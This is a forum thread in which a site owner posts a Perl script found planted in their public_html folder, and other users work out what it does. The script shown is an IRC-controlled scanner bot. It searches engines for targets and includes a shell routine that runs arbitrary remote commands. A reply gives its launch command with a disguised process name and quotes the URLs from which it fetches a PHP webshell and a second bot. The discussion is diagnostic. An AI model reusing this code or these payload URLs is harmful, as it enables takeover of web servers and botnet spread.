        my $search = ("http://www.bing.com/search?q=".key($key)."&filt=all&first=".$i."&FORM=PERE");
        my $res = search_engine_query($search);
        while ($res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g) {
            my $link = $1;
            if ($link !~ /msn|live|bing/) {
                my @grep = links($link);
                push(@list,@grep);
            }
        }
    }
    return @list;
}

sub altavista() {
    my @list;
    my $key = $_[0];
    for (my $i=1; $i<=1000; $i+=10){
        my $search = ("http://it.altavista.com/web/results?itag=ody&kgs=0&kls=0&dis=1&q=".key($key)."&stq=".$i);
        my $res = search_engine_query($search);
        while ($res =~ m/<span class=ngrn>(.+?)\//g) {
            my $link = $1;
            if ($link !~ /altavista/){
                $link =~ s/<//g;
                $link =~ s/ //g;
                my @grep = links($link);
                push(@list,@grep);
            }
        }
    }
    return @list;
}

sub ask() {
    my @list;
    my $key = $_[0];
    for (my $i=0; $i<=1000; $i+=10) {
        my $search = ("http://it.ask.com/web?q=".key($key)."&o=0&l=dir&qsrc=0&qid=EE90DE6E8F5370F363A63EC61228D4FE&dm=all&page=".$i);
        my $res = search_engine_query($search);
        while ($res =~ m/href=\"http:\/\/(.+?)\" onmousedown=/g) {
            my $link = $1;
            if ($link !~ /ask\.com/){
                my @grep = links($link);
                push(@list,@grep);
            }
        }
    }
    return @list;
}

sub yahoo() {
    my @list;
    my $key = $_[0];
    for (my $i=1; $i<=500; $i+=1) {
        my $search = ("http://www.search.yahoo.com/search?p=".key($key)."&ei=UTF-8&fr=yfp-t-501&fp_ip=IT&pstart=1&b=".$i);
        my $res = search_engine_query($search);
        while ($res =~ m/26u=(.*?)%26w=/g) {
            my $link = $1;
            if ($link!~ /yahoo/){
                my @grep = links($link);
                push(@list,@grep);
            }
        }
    }
    return @list;
}

#########################################

sub clean() {
    my @cln = ();
    my %visit = ();
    foreach my $element (@_) {
        $element =~ s/\/+/\//g;
        next if $visit{$element}++;
        push @cln, $element;
    }
    return @cln;
}

sub key() {
    my $dork = $_[0];
    $dork =~ s/ /\+/g;
    $dork =~ s/:/\%3A/g;
    $dork =~ s/\//\%2F/g;
    $dork =~ s/&/\%26/g;
    $dork =~ s/\"/\%22/g;
    $dork =~ s/,/\%2C/g;
    $dork =~ s/\\/\%5C/g;
    return $dork;
}

sub links() {
    my @list;
    my $link = $_[0];
    my $host = $_[0];
    my $hdir = $_[0];
    $hdir =~ s/(.*)\/[^\/]*$/\1/;
    $host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
    $host .= "/";
    $link .= "/";
    $hdir .= "/";
    $host =~ s/\/\//\//g;
    $hdir =~ s/\/\//\//g;
    $link =~ s/\/\//\//g;
    push(@list,$link,$host,$hdir);
    return @list;
}

sub search_engine_query() {
    my $url = $_[0];
    $url =~ s/http:\/\///;
    my $host = $url;
    my $query = $url;
    my $page  = "";
    $host =~ s/href=\"?http:\/\///;
    $host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
    $query =~ s/$host//;
    if ($query eq "") { $query = "/"; }
        eval {
            my $sock = IO::Socket::INET->new(PeerAddr=>"$host", PeerPort=>"80", Proto=>"tcp") or return;
            print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: $uagent\r\n\r\n";
            my @pages = <$sock>;
            $page = "@pages";
            close($sock);
        };
    return $page;
}

#########################################

sub shell() {
    my $path = $_[0];
    my $cmd = $_[1];
    if ($cmd =~ /cd (.*)/) {
        chdir("$1") || &msg("$path","No such file or directory");
        return;
    }
    elsif ($pid = fork) { waitpid($pid, 0); }
    else { if (fork) { exit; } else {
        my @output = `$cmd 2>&1 3>&1`;
        my $c = 0;
        foreach my $output (@output) {
            $c++;
            chop $output;
            &msg("$path","$output");
            if ($c == 5) { $c = 0; sleep 3; }
        }
        exit;
    }}
}

sub isAdmin() {
    my $status = 0;
    my $nick = $_[0];
    if ($nick eq $admin) { $status = 1; }
    return $status;
}

sub msg() {
    return unless $#_ == 1;
    sendraw($IRC_cur_socket, "PRIVMSG $_[0] :$_[1]");
}

sub nick() {
    return unless $#_ == 0;
    sendraw("NICK $_[0]");
}

sub notice() {
    return unless $#_ == 1;
    sendraw("NOTICE $_[0] :$_[1]");
}

The file was named 'escan', without any extension and it was located in the 'public_html'.

sazbaztaz 0 Newbie Poster · Answer 2 · 2011-01-27T05:04:51+00:00

Hmmm... Thanks Dandello. It looks like I got some friends. Of corse, I deleted the script immediately after discovered.

If the purpose of this script is to send info to spiders...

How can it send data to spiders when spiders do not know the location of the script?I mean, if the location is unknown it cannot be called right?

Dandello 8 Posting Whiz in Training · Answer 3 · 2011-01-27T05:43:17+00:00

I don't think it was sending to the spiders specifically - I think it was intercepting them and possibly sending info back that way or forwarding it elsewhere. But I do have to wonder about the person who put it on your server - the blasted thing has copyright info in it.

sazbaztaz 0 Newbie Poster · Answer 4 · 2011-01-27T08:00:31+00:00

Yes I saw the copyright! I went to the website and did a search but found no valuable information. The spider thingy is still not clear to me.

As far as I know the only way to intercept a spider is when a spider (eg google) requests a file. Eg when a spider arrives to my site it requests the "index.php", "robots.txt" etc files... How can the "escan" file intercept the spider unless someone hacks the "index.php" file and trough that file the "escan" gets requested.

The "escan" file itself cannot know the spider is coming. Am I missing something here?

mitchems 12 Posting Whiz in Training · Answer 5 · 2011-01-27T08:21:23+00:00

It appears to want to connect to an IRC channel and send info to that.

TerraBlade 0 Newbie Poster · Answer 6 · 2012-07-20T03:39:12+00:00

Hi sorry if my english is bad...

Its a Perl Bot Scanner...you can execute it even without extention or in .txt .jpg .gif etc. format

example:

perl escan irc.dal.net 6667 BotNick BotName ChannelName MyNick /usr/sbin/httpd

the fake process = /usr/sbin/httpd

my $injector = "http://live.birthbybaby.com/r57x.txt"; <-- php webshell
my $botshell = "http://antrax.us/tools/bot.pl"; <-- perl bot again

It will scan in different search engines looking for a site vulnerable in Local File Inclusion when it finds a vulnerable site $injector will automatically upload in the site and it upload $botshell on that host and auto execute.

The activity of the "escan" the perl scanner bot will be seen in the main channel